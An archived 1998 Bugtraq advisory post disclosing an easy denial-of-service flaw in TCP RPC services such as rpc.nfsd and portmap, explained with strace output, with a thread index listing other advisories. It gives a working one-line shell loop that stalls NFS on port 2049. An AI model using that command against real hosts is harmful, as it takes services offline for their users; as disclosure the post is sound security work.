Bugtraq mailing list archives
easy DoS in most RPC apps
From: peter () attic vuurwerk nl (Peter van Dijk)
Date: Sat, 28 Mar 1998 13:25:26 +0100
This is something Juggler found while poking around his ports. I investigated the problem further. If you connect (using telnet, netcat, anything) to a TCP port assigned to some RPC protocol (tested with rpc.nfsd/mountd/portmap on Slackware 3.4/Kernel 2.0.33) and send some 'garbage' (like a newline ;) every 5 seconds or faster, the service will completely stop responding. At the very moment the connection is closed, the service will return to normal work again. strace shows the following (from rpc.nfsd [nfs-server-2.2beta29]): alarm(5) = 0 sigreturn() = ? (mask now []) select(256, [4 5], NULL, NULL, NULL) = 1 (in [5]) accept(5, {sin_family=AF_INET, sin_port=htons(12406), sin_addr=inet_addr("127.0.0.1")}, [16]) = 0 select(256, [0 4 5], NULL, NULL, NULL) = 1 (in [0]) select(256, [0], NULL, NULL, {35, 0}) = 1 (in [0], left {35, 0}) read(0, "\r\n", 4000) = 2 The connection is accepted, after which a new select is started with both old file descriptors (tcp and udp listening sockets) and the new connection. Then some data arrives on the new connection, after which select is started with _only_ this connection as a parameter. Then a read is started, which can only be aborted by dropping the connection or hitting SIGALRM (which happens after 5 seconds). Right about that time, another newline is send restarting the whole loop. This bug can easily be exploited remotely without any special software and without taking any noticeable bandwidth (one packet every 5 seconds). This one worked perfectly for me: $ { while true ; do echo ; sleep 5 ; done } | telnet localhost 2049 Replacing the sleep 5 with sleep 6 or even more shows that the service will then respond every once in a while. Further examination shows that rpc.pcnfsd and rpc.ypxfrd are probably also vulnerable, as most other RPC applications that support TCP will be. Greetz, Peter. ------------------------------------------------------------------------------ 'Selfishness and separation have led me to . Peter 'Hardbeat' van Dijk to believe that the world is not my problem . network security consultant I am the world. And you are the world.' . (yeah, right...) Live - 10.000 years (peace is now) . peter () attic vuurwerk nl ------------------------------------------------------------------------------ 12:27am up 1 day, 23:05, 3 users, load average: 0.07, 0.10, 0.03 ------------------------------------------------------------------------------
Current thread:
- Re: apache+ssl 1.13 symlink problem Ben Laurie (Mar 24)
- Re: apache+ssl 1.13 symlink problem; NcFTP 2.4.2+ Mike Gleason (Mar 24)
- Clarification Mike Gleason (Mar 24)
- Protocol Aleph One (Mar 24)
- SECURITY: new svgalib and kbd now available Erik Troan (Mar 25)
- Sumbit Internet Account v1.1 Dax Kelson (Mar 25)
- Majordomo /tmp exploit Karl G - NOC Admin (Mar 26)
- FW: mysql: Trivial mSQL/MySQL DoS method? (fwd) Michael Widenius (Mar 26)
- Re: Majordomo /tmp exploit Steven Pritchard (Mar 26)
- easy DoS in most RPC apps Peter van Dijk (Mar 28)
- Netscape passes mailbox path and message ID as refferer Rop Gonggrijp (Mar 28)
- Hole. HKirk (Mar 28)
- Rhino9: WinGate Vulnerability Aleph One (Mar 29)
- MySQL Security Sandu Mihai (Mar 29)
- Re: MySQL Security Aleph One (Mar 29)
- Eudora Pro 4.0 attachment/long filename problem whiz (Mar 29)
- mysql: MySQL Security Michael Widenius (Mar 29)
- wtmpx utility for solaris Ryan (Mar 30)
- Re: wtmpx utility for solaris Mikael Brandstrom (Mar 31)
- Majordomo /tmp exploit Karl G - NOC Admin (Mar 26)
- HPSBUX9803-077 Security Vulnerability with inetd on HP-UX Aleph One (Mar 30)